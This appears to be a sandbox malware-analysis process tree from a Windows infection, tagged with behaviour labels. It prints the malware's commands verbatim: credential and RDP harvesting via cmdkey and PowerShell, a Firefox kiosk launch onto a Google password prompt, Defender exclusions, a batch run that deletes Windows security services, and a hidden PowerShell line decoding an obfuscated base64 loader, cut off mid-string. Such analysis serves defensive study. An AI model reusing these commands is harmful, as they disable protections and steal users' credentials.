C:\Windows\system32\vaultcmd.exe"vaultcmd" /list6⤵PID:6824
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list6⤵PID:6920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "6⤵
- Command and Scripting Interpreter: PowerShell
PID:6848 -
C:\Windows\system32\cmdkey.exe"C:\Windows\system32\cmdkey.exe" /list7⤵PID:7444
-
-
-
C:\Windows\system32\certutil.exe"certutil" -store My6⤵PID:5856
-
-
C:\Windows\system32\certutil.exe"certutil" -store -user My6⤵PID:1108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "Get-VpnConnection | ConvertTo-Json"6⤵
- Command and Scripting Interpreter: PowerShell
PID:2180
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "6⤵
- Command and Scripting Interpreter: PowerShell
- Hide Artifacts: Ignore Process Interrupts
PID:3324
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list6⤵PID:6308
-
-
C:\Windows\system32\cmdkey.exe"cmdkey" /list:TERMSRV/69.48.201.746⤵PID:6544
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathToSignedProductExe,productState /Format:List6⤵PID:7860
-
-
C:\Windows\system32\hostname.exe"hostname"6⤵PID:3680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "Get-WmiObject Win32_VideoController | ForEach-Object { $_.Name }"6⤵
- Command and Scripting Interpreter: PowerShell
PID:2928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "Get-NetAdapter | Where-Object { $_.Status -eq 'Up' -and $_.InterfaceDescription -notmatch 'virtual|loopback' } | Sort-Object -Property LinkSpeed -Descending | Select-Object -First 1 -ExpandProperty MacAddress"6⤵
- Command and Scripting Interpreter: PowerShell
PID:1696
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathToSignedProductExe,productState /Format:List6⤵PID:7316
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall show allprofiles state6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5232
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416740101\a1c5de4625.exe"C:\Users\Admin\AppData\Local\Temp\10416740101\a1c5de4625.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5320
-
-
C:\Users\Admin\AppData\Local\Temp\10416750101\5e4bf76d9c.exe"C:\Users\Admin\AppData\Local\Temp\10416750101\5e4bf76d9c.exe"5⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2984
-
-
C:\Users\Admin\AppData\Local\Temp\10416760101\b6c719608f.exe"C:\Users\Admin\AppData\Local\Temp\10416760101\b6c719608f.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4160 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:5408
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- System Location Discovery: System Language Discovery
PID:6020
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:664
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2596
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T6⤵
- System Location Discovery: System Language Discovery
PID:4280
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking6⤵PID:2984
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking7⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4988 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2024 -prefsLen 27099 -prefMapHandle 2028 -prefMapSize 270279 -ipcHandle 2116 -initialChannelId {c7c7e000-2800-4530-a473-93c64ac1be3d} -parentPid 4988 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4988" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu8⤵PID:2284
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2532 -prefsLen 27135 -prefMapHandle 2536 -prefMapSize 270279 -ipcHandle 2540 -initialChannelId {aec0f3b6-98f4-4065-b0ff-399ea8a1cc6a} -parentPid 4988 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4988" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket8⤵
- Checks processor information in registry
PID:4900
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3960 -prefsLen 25164 -prefMapHandle 3964 -prefMapSize 270279 -jsInitHandle 3968 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3976 -initialChannelId {5ee3d09b-cf22-4157-b43d-1be2ca924598} -parentPid 4988 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4988" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab8⤵
- Checks processor information in registry
PID:2940
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4128 -prefsLen 27276 -prefMapHandle 4132 -prefMapSize 270279 -ipcHandle 4200 -initialChannelId {da5fb70e-5a2e-4153-bf8d-a4c02bd8ced8} -parentPid 4988 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4988" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd8⤵PID:5764
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3196 -prefsLen 34775 -prefMapHandle 3080 -prefMapSize 270279 -jsInitHandle 3172 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3328 -initialChannelId {ec13f828-347c-497c-adfa-19ea3f85e8f9} -parentPid 4988 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4988" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab8⤵
- Checks processor information in registry
PID:452
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5204 -prefsLen 35012 -prefMapHandle 5208 -prefMapSize 270279 -ipcHandle 2736 -initialChannelId {f5aa5e3e-6054-461a-ae16-c01b85f66d41} -parentPid 4988 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4988" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility8⤵
- Checks processor information in registry
PID:7784
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5356 -prefsLen 32952 -prefMapHandle 5360 -prefMapSize 270279 -jsInitHandle 5364 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5164 -initialChannelId {14c3564a-335b-434e-b1a3-e2fd456b3410} -parentPid 4988 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4988" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab8⤵
- Checks processor information in registry
PID:7856
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5624 -prefsLen 32952 -prefMapHandle 5628 -prefMapSize 270279 -jsInitHandle 5632 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5608 -initialChannelId {2b42f49e-a6d3-4080-a7f0-fccaf5a24072} -parentPid 4988 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4988" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab8⤵
- Checks processor information in registry
PID:7880
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5808 -prefsLen 32952 -prefMapHandle 5812 -prefMapSize 270279 -jsInitHandle 5816 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5820 -initialChannelId {37497e80-e15e-4d5f-ad61-02b4f0df1cfd} -parentPid 4988 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4988" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab8⤵
- Checks processor information in registry
PID:7900
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416770101\58424ecd61.exe"C:\Users\Admin\AppData\Local\Temp\10416770101\58424ecd61.exe"5⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1528
-
-
C:\Users\Admin\AppData\Local\Temp\10416780101\8938ff0d0d.exe"C:\Users\Admin\AppData\Local\Temp\10416780101\8938ff0d0d.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7276 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:7336
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416790101\8e5094a924.exe"C:\Users\Admin\AppData\Local\Temp\10416790101\8e5094a924.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:7480
-
-
C:\Users\Admin\AppData\Local\Temp\10416800101\YGYZCmt.exe"C:\Users\Admin\AppData\Local\Temp\10416800101\YGYZCmt.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4628 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5460
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416810101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10416810101\Rm3cVPI.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:220
-
-
C:\Users\Admin\AppData\Local\Temp\10416820101\p3hx1_003.exe"C:\Users\Admin\AppData\Local\Temp\10416820101\p3hx1_003.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:5716 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'6⤵PID:7784
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵
- Command and Scripting Interpreter: PowerShell
PID:5828
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"6⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:4652 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""7⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
PID:7840 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath C:\8⤵
- Command and Scripting Interpreter: PowerShell
PID:13272
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Remove-MpPreference -ExclusionPath C:\8⤵PID:7976
-
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""7⤵
- Deletes itself
- Executes dropped EXE
PID:8032 -
C:\Users\Admin\AppData\Local\Temp\{b4016db7-0f75-43ad-80c4-976ac0755d04}\43a434f6.exe"C:\Users\Admin\AppData\Local\Temp\{b4016db7-0f75-43ad-80c4-976ac0755d04}\43a434f6.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot8⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
PID:6456 -
C:\Users\Admin\AppData\Local\Temp\{0656fd96-0fa0-49b4-8cf8-5aba626cf27c}\c6570e3e.exeC:/Users/Admin/AppData/Local/Temp/{0656fd96-0fa0-49b4-8cf8-5aba626cf27c}/\c6570e3e.exe -accepteula -adinsilent -silent -processlevel 2 -postboot9⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Loads dropped DLL
- Adds Run key to start application
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- Checks for VirtualBox DLLs, possible anti-VM trick
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: LoadsDriver
PID:12888
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416830101\qWR3lUj.exe"C:\Users\Admin\AppData\Local\Temp\10416830101\qWR3lUj.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7044 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵PID:4844
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- System Location Discovery: System Language Discovery
PID:5856
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10416840101\apple.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4748 -
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7756 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CD2E.tmp\CD3F.tmp\CD40.bat C:\Users\Admin\AppData\Local\Temp\261.exe"7⤵PID:7936
-
C:\Users\Admin\AppData\Local\Temp\261.exe"C:\Users\Admin\AppData\Local\Temp\261.exe" go8⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7288 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CE19.tmp\CE1A.tmp\CE1B.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"9⤵PID:5316
-
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"10⤵
- Launches sc.exe
PID:4152
-
-
C:\Windows\system32\sc.exesc start ddrver10⤵
- Launches sc.exe
PID:2652
-
-
C:\Windows\system32\timeout.exetimeout /t 110⤵
- Delays execution with timeout.exe
PID:6356
-
-
C:\Windows\system32\sc.exesc stop ddrver10⤵
- Launches sc.exe
PID:3964
-
-
C:\Windows\system32\sc.exesc start ddrver10⤵
- Launches sc.exe
PID:7920
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:7548
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3472
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"10⤵
- Launches sc.exe
PID:7492
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"10⤵
- Launches sc.exe
PID:5368
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f10⤵PID:6980
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"10⤵
- Launches sc.exe
PID:5044
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"10⤵
- Launches sc.exe
PID:6036
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f10⤵PID:3780
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"10⤵
- Launches sc.exe
PID:7280
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"10⤵
- Launches sc.exe
PID:988
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f10⤵PID:1596
-
-
C:\Windows\system32\sc.exesc stop "Sense"10⤵
- Launches sc.exe
PID:7336
-
-
C:\Windows\system32\sc.exesc delete "Sense"10⤵
- Launches sc.exe
PID:4576
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f10⤵PID:396
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"10⤵
- Launches sc.exe
PID:696
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"10⤵
- Launches sc.exe
PID:5828
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f10⤵
- Modifies security service
PID:7972
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"10⤵
- Launches sc.exe
PID:8224
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"10⤵
- Launches sc.exe
PID:8680
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f10⤵PID:8720
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"10⤵
- Launches sc.exe
PID:8752
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"10⤵
- Launches sc.exe
PID:8784
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f10⤵PID:8812
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"10⤵
- Launches sc.exe
PID:8848
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"10⤵
- Launches sc.exe
PID:8868
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f10⤵PID:8892
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"10⤵
- Launches sc.exe
PID:8928
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"10⤵
- Launches sc.exe
PID:8976
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f10⤵PID:9004
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"10⤵
- Launches sc.exe
PID:9044
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"10⤵
- Launches sc.exe
PID:9088
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f10⤵PID:1636
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"10⤵
- Launches sc.exe
PID:9148
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"10⤵
- Launches sc.exe
PID:9196
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f10⤵PID:1940
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"10⤵
- Launches sc.exe
PID:9256
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"10⤵
- Launches sc.exe
PID:9296
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f10⤵PID:6392
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"10⤵
- Launches sc.exe
PID:9360
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"10⤵
- Launches sc.exe
PID:9392
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f10⤵PID:9428
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"10⤵
- Launches sc.exe
PID:9452
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"10⤵
- Launches sc.exe
PID:9496
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f10⤵PID:9536
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"10⤵
- Launches sc.exe
PID:9584
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"10⤵
- Launches sc.exe
PID:9632
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f10⤵PID:9668
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"10⤵
- Launches sc.exe
PID:5176
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"10⤵
- Launches sc.exe
PID:9736
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f10⤵PID:9772
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f10⤵PID:9792
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f10⤵PID:9840
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f10⤵PID:6436
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f10⤵PID:9984
-
-
C:\Windows\system32\sc.exesc stop ddrver10⤵
- Launches sc.exe
PID:5956
-
-
C:\Windows\system32\sc.exesc delete ddrver10⤵
- Launches sc.exe
PID:6408
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10416850101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10416850101\TbV75ZR.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:10844 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
PID:10912 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10912 -s 6007⤵
- Program crash
PID:11452
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10416861121\5ym0ZYg.cmd"5⤵
- System Location Discovery: System Language Discovery
PID:11564 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10416861121\5ym0ZYg.cmd"6⤵
- System Location Discovery: System Language Discovery
PID:11648 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd